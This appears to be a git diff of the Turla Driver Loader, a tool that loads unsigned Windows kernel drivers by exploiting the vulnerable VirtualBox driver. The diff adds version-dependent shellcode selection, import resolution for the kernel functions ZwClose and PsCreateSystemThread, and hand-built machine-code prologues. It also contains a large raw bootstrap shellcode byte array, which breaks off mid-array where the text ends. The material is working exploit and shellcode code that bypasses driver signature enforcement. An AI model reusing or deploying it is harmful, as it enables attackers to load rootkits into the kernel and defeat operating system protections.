+VisualStudioVersion = 14.0.25420.1 MinimumVisualStudioVersion = 10.0.40219.1 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}" EndProject diff --git a/Source/DummyDrv2/dummy/dummy.vcxproj b/Source/DummyDrv2/dummy/dummy.vcxproj index 8fa877b..fd7810d 100644 --- a/Source/DummyDrv2/dummy/dummy.vcxproj +++ b/Source/DummyDrv2/dummy/dummy.vcxproj @@ -1,14 +1,6 @@  - - Debug - Win32 - - - Release - Win32 - Debug x64 @@ -17,22 +9,6 @@ Release x64 - - Debug - ARM - - - Release - ARM - - - Debug - ARM64 - - - Release - ARM64 - {3D8146DE-8064-46C0-9E70-CEEC357B2290} @@ -45,22 +21,6 @@ 8.1 - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - Windowsv6.3 true @@ -78,38 +38,6 @@ Universal true - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - @@ -118,18 +46,6 @@ - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - DbgengKernelDebugger AllRules.ruleset @@ -143,30 +59,6 @@ .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - false @@ -192,36 +84,6 @@ false - - - false - - - - - false - - - - - false - - - - - false - - - - - false - - - - - false - - false diff --git a/Source/DummyDrv2/dummy/main.c b/Source/DummyDrv2/dummy/main.c index 7b434d3..b933d1c 100644 --- a/Source/DummyDrv2/dummy/main.c +++ b/Source/DummyDrv2/dummy/main.c @@ -1,12 +1,14 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: MAIN.C * -* VERSION: 1.00 +* VERSION: 1.01 * -* DATE: 29 Jan 2016 +* DATE: 20 Apr 2017 +* +* "Driverless" example #2 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED @@ -19,6 +21,51 @@ #define DEBUGPRINT +/* +* PrintIrql +* +* Purpose: +* +* Debug print current irql. +* +*/ +VOID PrintIrql() +{ + KIRQL Irql; + PWSTR sIrql; + + Irql = KeGetCurrentIrql(); + + switch (Irql) { + + case PASSIVE_LEVEL: + sIrql = L"PASSIVE_LEVEL"; + break; + case APC_LEVEL: + sIrql = L"APC_LEVEL"; + break; + case DISPATCH_LEVEL: + sIrql = L"DISPATCH_LEVEL"; + break; + case CMCI_LEVEL: + sIrql = L"CMCI_LEVEL"; + break; + case CLOCK_LEVEL: + sIrql = L"CLOCK_LEVEL"; + break; + case IPI_LEVEL: + sIrql = L"IPI_LEVEL"; + break; + case HIGH_LEVEL: + sIrql = L"HIGH_LEVEL"; + break; + default: + sIrql = L"Unknown Value"; + break; + } + DbgPrint("KeGetCurrentIrql=%u(%ws)\n", Irql, sIrql); +} + /* * DevioctlDispatch * @@ -168,26 +215,6 @@ NTSTATUS CloseDispatch( return Irp->IoStatus.Status; } -VOID ListModules( - _In_ struct _DRIVER_OBJECT *DriverObject - ) -{ - PLIST_ENTRY entry0, entry1; - KLDR_DATA_TABLE_ENTRY *section = (KLDR_DATA_TABLE_ENTRY*)DriverObject->DriverSection; - - if (section == NULL) - return; - - entry0 = section->InLoadOrderLinks.Flink; - entry1 = entry0; - - do { - section = (KLDR_DATA_TABLE_ENTRY*)CONTAINING_RECORD(entry1, KLDR_DATA_TABLE_ENTRY, InLoadOrderLinks); - DbgPrint("Section=%p, %wZ", section, section->BaseDllName); - entry1 = entry1->Flink; - } while (entry1 != entry0); -} - /* * DriverInitialize * @@ -202,37 +229,33 @@ NTSTATUS DriverInitialize( ) { NTSTATUS status; - UNICODE_STRING SymLink, DevName/*, DrvRefName*/; + UNICODE_STRING SymLink, DevName; PDEVICE_OBJECT devobj; ULONG t; - WCHAR szDevName[] = { L'\\', L'D', L'e', L'v', L'i', L'c', L'e', L'\\', L'T', L'D', L'L', L'D', 0 }; - WCHAR szSymLink[] = { L'\\', L'D', L'o', L's', L'D', L'e', L'v', L'i', L'c', L'e', L's', L'\\', L'T', L'D', L'L', L'D', 0 }; -// WCHAR szNullDrv[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'N', L'u', L'l', L'l', 0 }; -// PDRIVER_OBJECT driverObject; //RegistryPath is NULL - UNREFERENCED_PARAMETER(RegistryPath); + UNREFERENCED_PARAMETER(RegistryPath); #ifdef DEBUGPRINT - DbgPrint("%s", __FUNCTION__); + DbgPrint("%s\n", __FUNCTION__); #endif - RtlInitUnicodeString(&DevName, szDevName); + RtlInitUnicodeString(&DevName, L"\\Device\\TDLD"); status = IoCreateDevice(DriverObject, 0, &DevName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, TRUE, &devobj); #ifdef DEBUGPRINT - DbgPrint("%s IoCreateDevice(%wZ) = %lx", __FUNCTION__, DevName, status); + DbgPrint("%s IoCreateDevice(%wZ) = %lx\n", __FUNCTION__, DevName, status); #endif if (!NT_SUCCESS(status)) { return status; } - RtlInitUnicodeString(&SymLink, szSymLink); + RtlInitUnicodeString(&SymLink, L"\\DosDevices\\TDLD"); status = IoCreateSymbolicLink(&SymLink, &DevName); #ifdef DEBUGPRINT - DbgPrint("%s IoCreateSymbolicLink(%wZ) = %lx", __FUNCTION__, SymLink, status); + DbgPrint("%s IoCreateSymbolicLink(%wZ) = %lx\n", __FUNCTION__, SymLink, status); #endif devobj->Flags |= DO_BUFFERED_IO; @@ -246,17 +269,6 @@ NTSTATUS DriverInitialize( DriverObject->DriverUnload = NULL; //nonstandard way of driver loading, no unload devobj->Flags &= ~DO_DEVICE_INITIALIZING; -/* - RtlInitUnicodeString(&DrvRefName, szNullDrv); - if (NT_SUCCESS(ObReferenceObjectByName(&DrvRefName, OBJ_CASE_INSENSITIVE, NULL, 0, - *IoDriverObjectType, KernelMode, NULL, &driverObject))) - { - DbgPrint("drvObj %p", driverObject); - ListModules(driverObject); - ObDereferenceObject(driverObject); - } - */ - return status; } @@ -274,22 +286,23 @@ NTSTATUS DriverEntry( ) { NTSTATUS status; - UNICODE_STRING drvName; - WCHAR szDrvName[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'T', L'D', L'L', L'D', 0 }; - + UNICODE_STRING drvName; + /* This parameters are invalid due to nonstandard way of loading and should not be used. */ UNREFERENCED_PARAMETER(DriverObject); UNREFERENCED_PARAMETER(RegistryPath); + PrintIrql(); + #ifdef DEBUGPRINT - DbgPrint("%s", __FUNCTION__); + DbgPrint("%s\n", __FUNCTION__); #endif - RtlInitUnicodeString(&drvName, szDrvName); + RtlInitUnicodeString(&drvName, L"\\Driver\\TDLD"); status = IoCreateDriver(&drvName, &DriverInitialize); #ifdef DEBUGPRINT - DbgPrint("%s IoCreateDriver(%wZ) = %lx", __FUNCTION__, drvName, status); + DbgPrint("%s IoCreateDriver(%wZ) = %lx\n", __FUNCTION__, drvName, status); #endif return status; diff --git a/Source/DummyDrv2/dummy/main.h b/Source/DummyDrv2/dummy/main.h index e69a424..4e203fd 100644 --- a/Source/DummyDrv2/dummy/main.h +++ b/Source/DummyDrv2/dummy/main.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: MAIN.H * -* VERSION: 1.00 +* VERSION: 1.01 * -* DATE: 29 Jan 2016 +* DATE: 20 Apr 2017 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED @@ -24,21 +24,6 @@ IoCreateDriver( IN PDRIVER_INITIALIZE InitializationFunction ); -NTKERNELAPI -NTSTATUS -ObReferenceObjectByName( - __in PUNICODE_STRING ObjectName, - __in ULONG Attributes, - __in_opt PACCESS_STATE AccessState, - __in_opt ACCESS_MASK DesiredAccess, - __in POBJECT_TYPE ObjectType, - __in KPROCESSOR_MODE AccessMode, - __inout_opt PVOID ParseContext, - __out PVOID *Object - ); - -extern POBJECT_TYPE *IoDriverObjectType; - _Dispatch_type_(IRP_MJ_DEVICE_CONTROL) DRIVER_DISPATCH DevioctlDispatch; _Dispatch_type_(IRP_MJ_CREATE) @@ -88,25 +73,3 @@ typedef struct _INOUT_PARAM { ULONG Param3; ULONG Param4; } INOUT_PARAM, *PINOUTPARAM; - -typedef struct _KLDR_DATA_TABLE_ENTRY { - LIST_ENTRY InLoadOrderLinks; - PVOID ExceptionTable; - ULONG ExceptionTableSize; - // ULONG padding on IA64 - PVOID GpValue; - PVOID NonPagedDebugInfo; - PVOID DllBase; - PVOID EntryPoint; - ULONG SizeOfImage; - UNICODE_STRING FullDllName; - UNICODE_STRING BaseDllName; - ULONG Flags; - USHORT LoadCount; - USHORT __Unused5; - PVOID SectionPointer; - ULONG CheckSum; - // ULONG padding on IA64 - PVOID LoadedImports; - PVOID PatchInformation; -} KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY; diff --git a/Source/Furutaka/Furutaka.vcxproj b/Source/Furutaka/Furutaka.vcxproj index ce94cc4..ddc2985 100644 --- a/Source/Furutaka/Furutaka.vcxproj +++ b/Source/Furutaka/Furutaka.vcxproj @@ -53,7 +53,7 @@ false .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ - NativeRecommendedRules.ruleset + AllRules.ruleset false @@ -78,23 +78,23 @@ Level4 - MaxSpeed + Full true true NDEBUG;_CONSOLE;%(PreprocessorDefinitions) - true CompileAsC true true false - Guard - MultiThreaded + MultiThreadedDLL + Neither + true Console true true - true + false TDLMain true RequireAdministrator diff --git a/Source/Furutaka/global.h b/Source/Furutaka/global.h index b15eb0d..b886899 100644 --- a/Source/Furutaka/global.h +++ b/Source/Furutaka/global.h @@ -4,9 +4,9 @@ * * TITLE: GLOBAL.H * -* VERSION: 1.10 +* VERSION: 1.11 * -* DATE: 17 Apr 2017 +* DATE: 20 Apr 2017 * * Common header file for the program support routines. * diff --git a/Source/Furutaka/main.c b/Source/Furutaka/main.c index c0b7c24..c6b259e 100644 --- a/Source/Furutaka/main.c +++ b/Source/Furutaka/main.c @@ -4,9 +4,9 @@ * * TITLE: MAIN.C * -* VERSION: 1.10 +* VERSION: 1.11 * -* DATE: 17 Apr 2017 +* DATE: 20 Apr 2017 * * Furutaka entry point. * @@ -34,17 +34,18 @@ BOOL g_ConsoleOutput = FALSE; BOOL g_VBoxInstalled = FALSE; WCHAR g_BE = 0xFEFF; +ULONG g_NtBuildNumber = 0; + #define VBoxDrvSvc TEXT("VBoxDrv") #define supImageName "furutaka" #define supImageHandle 0x1a000 #define PAGE_SIZE 0x1000 -#define scDataOffset 0x214 //shellcode data offset -#define T_LOADERTITLE TEXT("Turla Driver Loader v1.1 (17/04/17)") +#define T_LOADERTITLE TEXT("Turla Driver Loader v1.1.1 (20/04/17)") #define T_LOADERUNSUP TEXT("Unsupported WinNT version\r\n") #define T_LOADERRUN TEXT("Another instance running, close it before\r\n") #define T_LOADERUSAGE TEXT("Usage: loader drivertoload\n\re.g. loader mydrv.sys\r\n") -#define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.0 started\r\n(c) 2016 - 2017 TDL Project\r\nSupported x64 OS : 7 and above\r\n") +#define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.1 started\r\n(c) 2016 - 2017 TDL Project\r\nSupported x64 OS : 7 and above\r\n") /* * TDLVBoxInstalled @@ -83,8 +84,8 @@ BOOL TDLVBoxInstalled( * */ void TDLRelocImage( - ULONG_PTR Image, - ULONG_PTR NewImageBase + _In_ ULONG_PTR Image, + _In_ ULONG_PTR NewImageBase ) { PIMAGE_OPTIONAL_HEADER popth; @@ -139,9 +140,9 @@ void TDLRelocImage( * */ ULONG_PTR TDLGetProcAddress( - ULONG_PTR KernelBase, - ULONG_PTR KernelImage, - LPCSTR FunctionName + _In_ ULONG_PTR KernelBase, + _In_ ULONG_PTR KernelImage, + _In_ LPCSTR FunctionName ) { ANSI_STRING cStr; @@ -163,9 +164,9 @@ ULONG_PTR TDLGetProcAddress( * */ void TDLResolveKernelImport( - ULONG_PTR Image, - ULONG_PTR KernelImage, - ULONG_PTR KernelBase + _In_ ULONG_PTR Image, + _In_ ULONG_PTR KernelImage, + _In_ ULONG_PTR KernelBase ) { PIMAGE_OPTIONAL_HEADER popth; @@ -211,8 +212,9 @@ void TDLResolveKernelImport( * */ void TDLExploit( - LPVOID Shellcode, - ULONG CodeSize + _In_ LPVOID Shellcode, + _In_ ULONG CodeSize, + _In_ ULONG DataOffset ) { SUPCOOKIE Cookie; @@ -307,7 +309,7 @@ void TDLExploit( ultohex(CodeSize, _strend(text)); _strcat(text, TEXT("\r\n\tDriver image mapped at 0x")); - u64tohex((ULONG_PTR)ImageBase + scDataOffset, _strend(text)); + u64tohex((ULONG_PTR)ImageBase + DataOffset, _strend(text)); cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); } @@ -376,13 +378,14 @@ void TDLExploit( * */ UINT TDLMapDriver( - LPWSTR lpDriverFullName + _In_ LPWSTR lpDriverFullName ) { UINT result = (UINT)-1; - ULONG isz; + ULONG isz, prologueSize, dataOffset; SIZE_T memIO; - ULONG_PTR KernelBase, KernelImage = 0, xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0; + ULONG_PTR KernelBase, KernelImage = 0; + ULONG_PTR xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0, xZwClose = 0; HMODULE Image = NULL; PIMAGE_NT_HEADERS FileHeader; PBYTE Buffer = NULL; @@ -443,16 +446,30 @@ UINT TDLMapDriver( cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); } - RtlInitString(&routineName, "PsCreateSystemThread"); - status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread); - if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error, PsCreateSystemThread address not found"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x")); - u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + if (g_NtBuildNumber < 15063) { + RtlInitString(&routineName, "PsCreateSystemThread"); + status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread); + if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, PsCreateSystemThread address not found"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x")); + u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } + + RtlInitString(&routineName, "ZwClose"); + status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xZwClose); + if ((!NT_SUCCESS(status)) || (xZwClose == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, ZwClose address not found"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: ZwClose 0x")); + u64tohex(KernelBase + (xZwClose - KernelImage), _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } } memIO = isz + PAGE_SIZE; @@ -470,25 +487,49 @@ UINT TDLMapDriver( // mov rcx, ExAllocatePoolWithTag // mov rdx, PsCreateSystemThread + // mov r8, ZwClose Buffer[0x00] = 0x48; // mov rcx, xxxxx Buffer[0x01] = 0xb9; *((PULONG_PTR)&Buffer[2]) = KernelBase + (xExAllocatePoolWithTag - KernelImage); - Buffer[0x0a] = 0x48; // mov rdx, xxxxx - Buffer[0x0b] = 0xba; - *((PULONG_PTR)&Buffer[0x0c]) = - KernelBase + (xPsCreateSystemThread - KernelImage); - RtlCopyMemory(Buffer + 0x14, - TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code)); - RtlCopyMemory(Buffer + scDataOffset, Image, isz); + if (g_NtBuildNumber < 15063) { + Buffer[0x0a] = 0x48; // mov rdx, xxxxx + Buffer[0x0b] = 0xba; + *((PULONG_PTR)&Buffer[0x0c]) = + KernelBase + (xPsCreateSystemThread - KernelImage); + Buffer[0x14] = 0x49; //mov r8, xxxxx + Buffer[0x15] = 0xb8; + *((PULONG_PTR)&Buffer[0x16]) = + KernelBase + (xZwClose - KernelImage); + + prologueSize = 0x1e; + } + else { + prologueSize = 0x0a; + } + + dataOffset = prologueSize + MAX_SHELLCODE_LENGTH; + + if (g_NtBuildNumber < 15063) { + RtlCopyMemory(Buffer + prologueSize, + TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code)); + cuiPrintText(g_ConOut, TEXT("Ldr: Default bootstrap shellcode selected"), g_ConsoleOutput, TRUE); + } + else { + RtlCopyMemory(Buffer + prologueSize, + TDLBootstrapLoader_code_w10rs2, sizeof(TDLBootstrapLoader_code_w10rs2)); + cuiPrintText(g_ConOut, TEXT("Ldr: Windows 10 RS2+ bootstrap shellcode selected"), g_ConsoleOutput, TRUE); + } + + RtlCopyMemory(Buffer + dataOffset, Image, isz); cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE); - TDLResolveKernelImport((ULONG_PTR)Buffer + scDataOffset, KernelImage, KernelBase); + TDLResolveKernelImport((ULONG_PTR)Buffer + dataOffset, KernelImage, KernelBase); cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), g_ConsoleOutput, TRUE); - TDLExploit(Buffer, isz + PAGE_SIZE); + TDLExploit(Buffer, isz + PAGE_SIZE, dataOffset); result = 0; break; } @@ -575,14 +616,15 @@ HANDLE TDLStartVulnerableDriver( } } - //if vbox installed backup it driver, do it before dropping our + // + // If vbox installed backup it driver, do it before dropping our + // Ignore error if file not found + // if (g_VBoxInstalled) { if (supBackupVBoxDrv(FALSE) == FALSE) { cuiPrintText(g_ConOut, TEXT("Ldr: Error while doing VirtualBox driver backup"), g_ConsoleOutput, TRUE); - - break; } } @@ -717,7 +759,7 @@ void TDLStopVulnerableDriver( * */ UINT TDLProcessCommandLine( - LPWSTR lpCommandLine + _In_ LPWSTR lpCommandLine ) { UINT retVal = (UINT)-1; @@ -765,7 +807,7 @@ void TDLMain() UINT uResult = 0; DWORD dwTemp; LONG x; - OSVERSIONINFOW osv; + OSVERSIONINFO osv; WCHAR text[256]; __security_init_cookie(); @@ -795,7 +837,6 @@ void TDLMain() T_LOADERINTRO, g_ConsoleOutput, TRUE); - x = InterlockedIncrement((PLONG)&g_lApplicationInstances); if (x > 1) { cuiPrintText(g_ConOut, @@ -817,6 +858,8 @@ void TDLMain() break; } + g_NtBuildNumber = osv.dwBuildNumber; + _strcpy(text, TEXT("Ldr: Windows v")); ultostr(osv.dwMajorVersion, _strend(text)); _strcat(text, TEXT(".")); @@ -825,6 +868,10 @@ void TDLMain() ultostr(osv.dwBuildNumber, _strend(text)); cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + // + // If VirtualBox installed on the same machine warn user, + // however this is unnecessary can lead to any conflicts. + // g_VBoxInstalled = TDLVBoxInstalled(); if (g_VBoxInstalled) { cuiPrintText(g_ConOut, diff --git a/Source/Furutaka/resource.rc b/Source/Furutaka/resource.rc index 351f442c7176a2a4729c40bed9b8f6bc4cff6863..9b6d71fe72095ebbdcf596f94c50ba42be17f8d5 100644 GIT binary patch delta 42 vcmX@6b4+K04mYFWWL<7^M#Igi+#i{MR5+hEkeVFMr#ShVfY9b^0tKu96jKbt delta 42 vcmX@6b4+K04mYF0WL<7^MuW|%+#i{MR5+hEkeVFMr#ShVfY9b^0tKu96Y>nd diff --git a/Source/Furutaka/shellcode.h b/Source/Furutaka/shellcode.h index 469aa42..8bf5be4 100644 --- a/Source/Furutaka/shellcode.h +++ b/Source/Furutaka/shellcode.h @@ -4,9 +4,9 @@ * * TITLE: SHELLCODE.H * -* VERSION: 1.10 +* VERSION: 1.11 * -* DATE: 17 Apr 2017 +* DATE: 20 Apr 2017 * * Loader bootstrap shellcode. * @@ -22,8 +22,7 @@ typedef PVOID(NTAPI *PfnExAllocatePoolWithTag)( _In_ POOL_TYPE PoolType, _In_ SIZE_T NumberOfBytes, - _In_ ULONG Tag - ); + _In_ ULONG Tag); typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)( _Out_ PHANDLE ThreadHandle, @@ -32,8 +31,14 @@ typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)( _In_opt_ HANDLE ProcessHandle, _Out_opt_ PCLIENT_ID ClientId, _In_ PKSTART_ROUTINE StartRoutine, - _In_opt_ PVOID StartContext - ); + _In_opt_ PVOID StartContext); + +typedef NTSTATUS (NTAPI *PfnZwClose)( + _In_ HANDLE Handle); + +typedef NTSTATUS(NTAPI *PfnDriverEntry)(); + +#define MAX_SHELLCODE_LENGTH 0x300 /* * TDLBootstrapLoader @@ -46,10 +51,11 @@ typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)( /* void TDLBootstrapLoader( PfnExAllocatePoolWithTag ExAllocatePoolWithTag, - PfnPsCreateSystemThread PsCreateSystemThread) + PfnPsCreateSystemThread PsCreateSystemThread, + PfnZwClose ZwClose) { ULONG_PTR pos, exbuffer, - Image = ((ULONG_PTR)&TDLBootstrapLoader) + 0x200; + Image = ((ULONG_PTR)&TDLBootstrapLoader) + MAX_SHELLCODE_LENGTH; PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image; PIMAGE_FILE_HEADER fileh = @@ -110,36 +116,148 @@ void TDLBootstrapLoader( for (pos = 0; pos < isz; pos++) ((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos]; + th = NULL; InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL); - PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL, - (PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL); + if (NT_SUCCESS(PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL, + (PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL))) + { + ZwClose(th); + } } */ -static const unsigned char TDLBootstrapLoader_code[415] = { - 0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2, - 0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF, - 0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C, - 0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, - 0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00, - 0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, - 0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, - 0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, - 0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, - 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00, +const unsigned char TDLBootstrapLoader_code[480] = { + 0x48, 0x8B, 0xC4, 0x41, 0x54, 0x48, 0x81, 0xEC, 0x90, 0x00, 0x00, 0x00, 0x48, 0x89, 0x58, 0x10, + 0x4D, 0x8B, 0xE0, 0x48, 0x89, 0x68, 0x18, 0x48, 0x8D, 0x1D, 0xE2, 0xFF, 0xFF, 0xFF, 0x4C, 0x89, + 0x68, 0xE8, 0x48, 0x81, 0xC3, 0x00, 0x03, 0x00, 0x00, 0x4C, 0x89, 0x70, 0xE0, 0x4C, 0x8B, 0xEA, + 0x4C, 0x89, 0x78, 0xD8, 0x4C, 0x8B, 0xC9, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C, 0x53, 0x4C, + 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, 0x10, 0x00, + 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xC9, 0x48, 0x8D, 0xA8, 0x00, 0x10, 0x00, 0x00, 0x48, 0x81, + 0xE5, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, 0x86, 0xB0, + 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, 0xA1, 0x00, + 0x00, 0x00, 0x48, 0x89, 0xB4, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, 0x41, 0x8B, + 0xB6, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDD, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, 0xBC, 0x24, + 0x88, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xF9, 0x85, 0xF6, 0x74, 0x68, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43, 0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9, 0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C, 0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48, - 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0, - 0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, - 0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48, - 0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, + 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFE, 0x72, 0xA0, + 0x45, 0x33, 0xC9, 0x48, 0x8B, 0xB4, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0x88, + 0x00, 0x00, 0x00, 0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0x7C, 0x24, 0x70, 0x48, 0xC1, 0xEA, 0x03, 0x48, + 0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCD, 0x48, 0x2B, 0xDD, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 